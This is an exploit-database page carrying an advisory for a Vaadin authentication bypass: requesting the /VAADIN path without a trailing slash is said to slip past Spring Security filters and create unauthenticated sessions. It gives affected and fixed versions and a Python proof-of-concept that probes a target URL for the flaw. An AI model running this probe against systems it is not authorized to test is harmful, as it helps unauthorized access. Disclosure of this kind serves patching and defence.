Vulners
Lucene search
📄 Vaadin 25.x Authentication Bypass
==================================================================================================================================
| # Title : Vaadin 25.x Authentication Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://vaadin.com/ |
==================================================================================================================================
[+] Summary : This vulnerability affects multiple versions of Vaadin ( 6.8.13 ,14.x, 23.x, 24.x, and 25.x) when used with Spring Security, due to inconsistent path pattern matching on reserved framework routes.
Accessing the /VAADIN endpoint without a trailing slash can bypass security filters, allowing unauthenticated users to trigger framework initialization and create valid sessions without proper authorization.
[+] It was successfully tested on : 6.8.13
[+] This impacts Vaadin versions:
14.0.0 – 14.14.0 → fixed in 14.14.1
23.0.0 – 23.6.6 → fixed in 23.6.7
24.0.0 – 24.9.7 → fixed in 24.9.8
25.0.0 – 25.0.1 → fixed in 25.0.2+
[+] Older unsupported branches (10–13 and 15–22) are also affected and require upgrading to supported releases.
[+] A Python proof-of-concept scanner demonstrates the issue by requesting the /VAADIN endpoint and checking for signs of session creation.
If the server returns HTTP 200 along with a JSESSIONID cookie, the application is flagged as potentially vulnerable.
Otherwise, responses like 401 or 302 suggest that authentication protections are still active.
[+] POC :
import requests
import sys
def check_vaadin_auth_bypass(url):
"""
Checks if a Vaadin application is vulnerable
by accessing the /VAADIN endpoint without a trailing slash.
"""
target_url = url.rstrip('/') + '/VAADIN'
headers = {
'User-Agent': 'indoushka-Scanner'
}
try:
print(f"[*] Checking {target_url}")
response = requests.get(target_url, headers=headers, allow_redirects=False, timeout=10)
if response.status_code == 200 and 'JSESSIONID' in response.cookies:
print(f"[!] VULNERABLE: Authentication bypass succeeded on {target_url}")
print(f"[!] New session created: {response.cookies.get('JSESSIONID', 'Not Found')}")
return True
elif response.status_code == 200:
print(f"[-] Got HTTP 200 but no new JSESSIONID cookie. Might not be vulnerable or already patched.")
elif response.status_code == 401 or response.status_code == 302:
print(f"[-] Not vulnerable. Received HTTP {response.status_code} (authentication required or redirect).")
else:
print(f"[-] Unexpected response: HTTP {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[ERROR] Could not connect to {target_url}: {e}")
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python poc.py <target_base_url>")
print("Example: python poc.py https://example.com")
sys.exit(1)
target = sys.argv[1]
check_vaadin_auth_bypass(target)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9